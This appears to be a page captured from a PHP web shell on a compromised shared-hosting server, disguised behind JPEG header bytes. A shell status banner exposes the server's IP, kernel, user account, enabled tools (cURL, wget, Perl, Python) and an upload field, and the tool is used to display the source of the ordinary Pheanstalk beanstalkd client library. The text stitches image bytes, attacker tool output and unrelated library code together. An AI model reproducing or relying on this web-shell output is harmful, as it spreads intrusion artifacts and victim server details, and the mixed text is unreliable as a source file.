����JFIF��x�x����'
| Server IP : 78.140.185.180 / Your IP : 216.73.216.170 Web Server : LiteSpeed System : Linux cpanel13.v.fozzy.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : builderbox ( 1072) PHP Version : 7.3.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /proc/self/root/proc/self/root/home/builderbox/./www/vendor/pda/pheanstalk/src/ |
Upload File : |
<?php
namespace Pheanstalk;
use Pheanstalk\Contract\CommandInterface;
use Pheanstalk\Contract\JobIdInterface;
use Pheanstalk\Contract\PheanstalkInterface;
use Pheanstalk\Contract\ResponseInterface;
use Pheanstalk\Contract\SocketFactoryInterface;
use Pheanstalk\Exception\DeadlineSoonException;
/**
* Pheanstalk is a PHP client for the beanstalkd workqueue.
*/
class Pheanstalk implements PheanstalkInterface
{
/**
* @var Connection
*/
private $connection;
/**
* @var ?string
*/
private $using = PheanstalkInterface::DEFAULT_TUBE;
/**
* @var array<string,bool>
*/
private $watching = [PheanstalkInterface::DEFAULT_TUBE => true];
public function __construct(Connection $connection)
{
$this->connection = $connection;
}
/**
* Static constructor that uses autodetection to choose an underlying socket implementation
* @param string $host
* @param int $port
* @param int $connectTimeout
* @return Pheanstalk
*/
public static function create(string $host, int $port = 11300, int $connectTimeout = 10)
{
return self::createWithFactory(new SocketFactory($host, $port, $connectTimeout));
}
/**
* Static constructor that uses a given socket factory for underlying connections
* @param SocketFactoryInterface $factory
* @return Pheanstalk
*/
public static function createWithFactory(SocketFactoryInterface $factory)
{
return new self(new Connection($factory));
}
// ----------------------------------------
/**
* {@inheritdoc}
*/
public function bury(JobIdInterface $job, int $priority = PheanstalkInterface::DEFAULT_PRIORITY): void
{
$this->dispatch(new Command\BuryCommand($job, $priority));
}
/**
* {@inheritdoc}
*/
public function delete(JobIdInterface $job): void
{
$this->dispatch(new Command\DeleteCommand($job));
}
/**
* {@inheritdoc}
*/
public function ignore(string $tube): PheanstalkInterface
{
if (isset($this->watching[$tube])) {
$this->dispatch(new Command\IgnoreCommand($tube));
unset($this->watching[$tube]);
}
return $this;
}
/**
* {@inheritdoc}
*/
public function kick(int $max): int
{
$response = $this->dispatch(new Command\KickCommand($max));
return $response['kicked'];
}
/**
* {@inheritdoc}
*/
public function kickJob(JobIdInterface $job): void
{
$this->dispatch(new Command\KickJobCommand($job));
}
/**
* {@inheritdoc}
*/
public function listTubes(): array
{
return (array)$this->dispatch(
new Command\ListTubesCommand()
);
}
/**
* {@inheritdoc}
*/
public function listTubesWatched(bool $askServer = false): array
{
if ($askServer) {
$response = (array)$this->dispatch(
new Command\ListTubesWatchedCommand()
);
$this->watching = array_fill_keys($response, true);
}
return array_keys($this->watching);
}
/**
* {@inheritdoc}
*/
public function listTubeUsed(bool $askServer = false): string
{
if ($askServer) {
$response = $this->dispatch(
new Command\ListTubeUsedCommand()
);
$this->using = $response['tube'];
}
return $this->using;
}
/**
* {@inheritdoc}
*/
public function pauseTube(string $tube, int $delay): void
{
$this->dispatch(new Command\PauseTubeCommand($tube, $delay));
}
/**
* {@inheritdoc}
*/
public function resumeTube(string $tube): void
{
// Pause a tube with zero delay will resume the tube
$this->pauseTube($tube, 0);
}
/**
* {@inheritdoc}
*/
public function peek(JobIdInterface $job): Job
{
$response = $this->dispatch(
new Command\PeekJobCommand($job)
);
return new Job($response['id'], $response['jobdata']);
}
/**
* {@inheritdoc}
*/
public function peekReady(): ?Job
{
$response = $this->dispatch(
new Command\PeekCommand(Command\PeekCommand::TYPE_READY)
);
if ($response->getResponseName() === ResponseInterface::RESPONSE_NOT_FOUND) {
return null;
}
return new Job($response['id'], $response['jobdata']);
}
/**
* {@inheritdoc}
*/
public function peekDelayed(): ?Job
{
$response = $this->dispatch(
new Command\PeekCommand(Command\PeekCommand::TYPE_DELAYED)
);
if ($response->getResponseName() === ResponseInterface::RESPONSE_NOT_FOUND) {
return null;
}
return new Job($response['id'], $response['jobdata']);
}
/**
* {@inheritdoc}
*/
public function peekBuried(): ?Job
{
$response = $this->dispatch(
new Command\PeekCommand(Command\PeekCommand::TYPE_BURIED)
);
if ($response->getResponseName() === ResponseInterface::RESPONSE_NOT_FOUND) {
return null;
}
return new Job($response['id'], $response['jobdata']);
}
/**
* {@inheritdoc}
*/
public function put(
string $data,
int $priority = PheanstalkInterface::DEFAULT_PRIORITY,
int $delay = PheanstalkInterface::DEFAULT_DELAY,
int $ttr = PheanstalkInterface::DEFAULT_TTR
): Job {
$response = $this->dispatch(
new Command\PutCommand($data, $priority, $delay, $ttr)
);
return new Job($response['id'], $data);
}
/**
* {@inheritdoc}
*/
public function release(
JobIdInterface $job,
int $priority = PheanstalkInterface::DEFAULT_PRIORITY,
int $delay = PheanstalkInterface::DEFAULT_DELAY
): void {
$this->dispatch(
new Command\ReleaseCommand($job, $priority, $delay)
);
}
/**
* {@inheritdoc}
*/
public function reserve(): Job
{
$response = $this->dispatch(
new Command\ReserveCommand()
);
return new Job($response['id'], $response['jobdata']);
}
/**
* {@inheritdoc}
*/
public function reserveWithTimeout(int $timeout): ?Job
{
$response = $this->dispatch(
new Command\ReserveWithTimeoutCommand($timeout)
);
if ($response->getResponseName() === ResponseInterface::RESPONSE_DEADLINE_SOON) {
throw new DeadlineSoonException();
}
if ($response->getResponseName() === ResponseInterface::RESPONSE_TIMED_OUT) {
return null;
}
return new Job($response['id'], $response['jobdata']);
}
/**
* {@inheritdoc}
*/
public function statsJob(JobIdInterface $job): ResponseInterface
{
return $this->dispatch(new Command\StatsJobCommand($job));
}
/**
* {@inheritdoc}
*/
public function statsTube(string $tube): ResponseInterface
{
return $this->dispatch(new Command\StatsTubeCommand($tube));
}
/**
* {@inheritdoc}
*/
public function stats(): ResponseInterface
{
return $this->dispatch(new Command\StatsCommand());
}
/**
* {@inheritdoc}
*/
public function touch(JobIdInterface $job): void
{
$this->dispatch(new Command\TouchCommand($job));
}
/**
* {@inheritdoc}
*/
public function useTube(string $tube): PheanstalkInterface
{
if ($this->using !== $tube) {
$this->dispatch(new Command\UseCommand($tube));
$this->using = $tube;
}
return $this;
}
/**
* {@inheritdoc}
*/
public function watch(string $tube): PheanstalkInterface
{
if (!isset($this->watching[$tube])) {
$this->dispatch(new Command\WatchCommand($tube));
$this->watching[$tube] = true;
}
return $this;
}
/**
* {@inheritdoc}
*/
public function watchOnly(string $tube): PheanstalkInterface
{
$this->watch($tube);
$ignoreTubes = array_diff_key($this->watching, [$tube => true]);
foreach ($ignoreTubes as $ignoreTube => $true) {
$this->ignore($ignoreTube);
}
return $this;
}
// ----------------------------------------
/**
* Dispatches the specified command to the connection object.
*
* If a SocketException occurs, the connection is reset, and the command is
* re-attempted once.
*
* @param CommandInterface $command
*
* @return ResponseInterface
*/
private function dispatch($command)
{
try {
$response = $this->connection->dispatchCommand($command);
} catch (Exception\SocketException $e) {
$this->reconnect();
$response = $this->connection->dispatchCommand($command);
}
return $response;
}
/**
* Creates a new connection object, based on the existing connection object,
* and re-establishes the used tube and watchlist.
*/
private function reconnect()
{
$this->connection->disconnect();
if ($this->using !== PheanstalkInterface::DEFAULT_TUBE) {
$this->dispatch(new Command\UseCommand($this->using));
}
foreach ($this->watching as $tube => $true) {
if ($tube != PheanstalkInterface::DEFAULT_TUBE) {
unset($this->watching[$tube]);
$this->watch($tube);
}
}
if (!isset($this->watching[PheanstalkInterface::DEFAULT_TUBE])) {
$this->ignore(PheanstalkInterface::DEFAULT_TUBE);
}
}
/**
* @param string $tube The tube to use during execution
* @param \Closure $closure Closure to execute while using the specified tube
* @return mixed the return value of the closure.
* @internal This is marked as internal since it is not part of a stabilized interface.
*/
public function withUsedTube(string $tube, \Closure $closure)
{
$used = $this->listTubeUsed();
try {
$this->useTube($tube);
return $closure($this);
} finally {
$this->useTube($used);
}
}
/**
* @param string $tube The tube to watch during execution
* @param \Closure $closure Closure to execute while using the specified tube
* @return mixed the return value of the closure.
* @internal This is marked as internal since it is not part of a stabilized interface.
*/
public function withWatchedTube(string $tube, \Closure $closure)
{
$watched = $this->listTubesWatched();
try {
$this->watchOnly($tube);
return $closure($this);
} finally {
foreach ($watched as $tube) {
$this->watch($tube);
}
if (!in_array($tube, $watched)) {
$this->ignore($tube);
}
}
}
}